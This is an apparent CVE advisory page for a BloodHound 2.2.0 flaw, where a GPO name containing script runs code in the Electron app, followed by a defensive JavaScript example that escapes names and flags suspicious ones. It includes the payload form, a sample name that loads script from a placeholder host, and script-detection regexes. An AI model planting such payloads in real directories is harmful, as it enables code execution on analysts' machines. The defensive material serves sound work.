CVE-2019-15701
Description
components/Modals/HelpModal.jsx in BloodHound 2.2.0 allows remote attackers to execute arbitrary OS commands (by spawning a child process as the current user on the victim's machine) when the search function's autocomplete feature is used. The victim must import data from an Active Directory with a GPO containing JavaScript in its name.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
BloodHound 2.2.0 allows remote OS command execution via a crafted GPO name with JavaScript in the search autocomplete feature.
Vulnerability
In BloodHound 2.2.0, the components/Modals/HelpModal.jsx component contains a vulnerability in the search function's autocomplete feature. An attacker can create an Active Directory Group Policy Object (GPO) with a name containing malicious JavaScript code. When a user imports data from such an Active Directory (e.g., via SharpHound) and subsequently uses the search autocomplete feature in BloodHound (e.g., searching for a matching string), the injected JavaScript executes. The user must have imported data from an AD that contains a GPO with a crafted name [1].
Exploitation
An attacker who can create or modify a GPO in an Active Directory environment (i.e., has write access to a GPO) can set the GPO name to a string such as aaaaaa<SCRIPT SRC="http://:/poc.js">. The victim then runs SharpHound to collect AD data (e.g., Invoke-BloodHound -Stealth) and imports the resulting JSON into BloodHound. When the victim types a search query that matches part of the GPO name (e.g., "aa"), the autocomplete feature renders the GPO name, causing the external script to load and execute. The script runs in the context of the Desktop application (Electron/Node.js), allowing spawning of child processes. The provided proof-of-concept demonstrates a reverse shell via ncat [1].
Impact
Successful exploitation allows an attacker to execute arbitrary OS commands on the victim's machine, with the privileges of the current user running BloodHound. This can lead to full compromise of the workstation, including lateral movement possibilities if the user has elevated domain permissions. The impact is high, as it bypasses typical web security boundaries and achieves remote code execution in a desktop application [1].
Mitigation
No official patch or fixed version has been released by the BloodHound team as of the publication date (August 27, 2019). The vendor acknowledged the issue (GitHub issue #267) but no fix was provided in the available references. Users should avoid importing data from untrusted Active Directory sources and consider manually inspecting GPO names for unusual JavaScript until a patch is available [1].
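The underlying defect described above is an untrusted directory object name being rendered as HTML inside an Electron application, where script execution reaches Node.js. As an added example that is not BloodHound's code, the JavaScript below shows the two defensive controls a practitioner would want: rendering imported names as escaped text rather than markup, and automatically flagging imported names that contain markup or script-like content before they reach the UI (the manual "inspect GPO names" mitigation, automated). The export record shape, the `Properties.name` field and the sample data are constructed approximations, not the real SharpHound schema.

```javascript
// Added example (not BloodHound's code): defensive handling of untrusted
// directory object names in an Electron/React style desktop app.
// The record shape below ({ gpos: [{ Properties: { name } }] }) is a
// constructed approximation of a SharpHound-style export, not the real schema.

// 1. Render untrusted names as text, never as markup. In React that means
//    passing the string as a child ({name}) instead of dangerouslySetInnerHTML;
//    for plain DOM code, escape before inserting into innerHTML.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Build one autocomplete row as an HTML string with the name escaped, so a
// name containing a <script> tag is displayed literally instead of executed.
function renderSuggestion(name) {
  return `<li class="suggestion">${escapeHtml(name)}</li>`;
}

// 2. Flag imported object names that contain markup before import/render.
//    Returns a list of { kind, name, reason } findings. The patterns are
//    deliberately coarse (they may flag benign names such as "onboarding=")
//    because the goal is triage of imported data, not exact parsing.
const MARKUP_RE = /<\s*\/?\s*[a-z][^>]*>/i;                    // any HTML-like tag
const SCRIPT_RE = /<\s*script\b|javascript:|\bon[a-z]+\s*=/i;  // script-ish content

function findSuspiciousNames(exportJson) {
  const findings = [];
  for (const [kind, objects] of Object.entries(exportJson)) {
    for (const obj of objects) {
      const name = obj.Properties && obj.Properties.name;
      if (typeof name !== 'string') continue;
      if (SCRIPT_RE.test(name)) {
        findings.push({ kind, name, reason: 'script-like content' });
      } else if (MARKUP_RE.test(name)) {
        findings.push({ kind, name, reason: 'html markup' });
      }
    }
  }
  return findings;
}

// Constructed sample export: one benign GPO, one whose name carries a script
// tag pointing at a placeholder host, and one benign user.
const SAMPLE_EXPORT = {
  gpos: [
    { Properties: { name: 'DEFAULT DOMAIN POLICY@EXAMPLE.LOCAL' } },
    { Properties: { name: 'aaaaaa<script src="http://placeholder.invalid/poc.js"></script>@EXAMPLE.LOCAL' } },
  ],
  users: [
    { Properties: { name: 'ALICE@EXAMPLE.LOCAL' } },
  ],
};

// Stand-alone usage: list findings, then show how the flagged name would be
// rendered safely.
if (typeof require !== 'undefined' && require.main === module) {
  console.log(findSuspiciousNames(SAMPLE_EXPORT));
  console.log(renderSuggestion(SAMPLE_EXPORT.gpos[1].Properties.name));
}
```

Running `findSuspiciousNames` over an export before loading it into a graph database gives a defender a concrete gate for the "inspect GPO names" advice, while `escapeHtml` (or React's default text rendering) is the fix that removes the execution path regardless of what the data contains.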
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- BloodHound/BloodHound
- Range: =2.2.0
Patches
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
- [1] github.com/BloodHoundAD/BloodHound/issues/267 (MITRE, x_refsource_MISC)
News mentions
No linked articles in our index yet.